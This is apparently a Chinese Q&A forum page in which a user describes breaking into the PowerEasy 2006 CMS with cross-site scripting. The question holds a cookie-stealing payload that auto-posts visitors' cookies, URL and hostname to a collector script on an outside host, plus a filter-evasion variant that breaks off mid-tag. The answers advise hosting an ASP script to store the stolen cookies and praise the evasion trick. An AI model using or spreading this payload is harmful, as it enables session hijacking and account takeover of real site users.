拿到的Cookies被提交到哪里?

来源:百度知道 编辑:UC知道 时间:2024/06/17 08:12:01
在侵入动易2006的时候,会输入如下的代码获取Cookies

<form name=redir action=http://www.xxx.com/cookies/cookie.asp method=post>
<input type=hidden name=cookie>
<input type=hidden name=url>
<input type=hidden name=hostname>
</form>
<script>redir.cookie.value=document.cookie;redir.url.value=location.href;redir.hostname.value=location.hostname;redir.submit();</script>
现在我们在一些可能的敏感字符中插入SCRIPT字符,以防我们的代码被破坏

更改后的代码如下:
<FOSCRIPTRM naSCRIPTme=redSCRIPTir actSCRIPTion=http://www.xxx.com/cooSCRIPTkies/cooSCRIPTkie.asp>
<input type=hidSCRIPTden name=coSCRIPTokie>
<input type=hidSCRIPTden name=uSCRIPTrl>
<input type=hidSCRIPTden name=hoSCRIPTstname>
</forSCRIPTm>
<scrSCRIPT

form表单中的action地址就是cookie要发送的地址,为配合跨站攻击,需要一个asp脚本来接受提交过来的cookie并保存起来。

你需要编个asp脚本放到自己的网站上,这个脚本只需要保存cookie就行了,然后把这个脚本地址放到form表单的action后面。

如果漏洞确实如此,添加SCRIPT反而是其精华了,利用留言本过滤程序自己打自己嘴巴,很巧妙的XSS攻击。

不知道你瞎搞什么,但是你在每条句柄内添加“SCRIPT”是很搞笑的!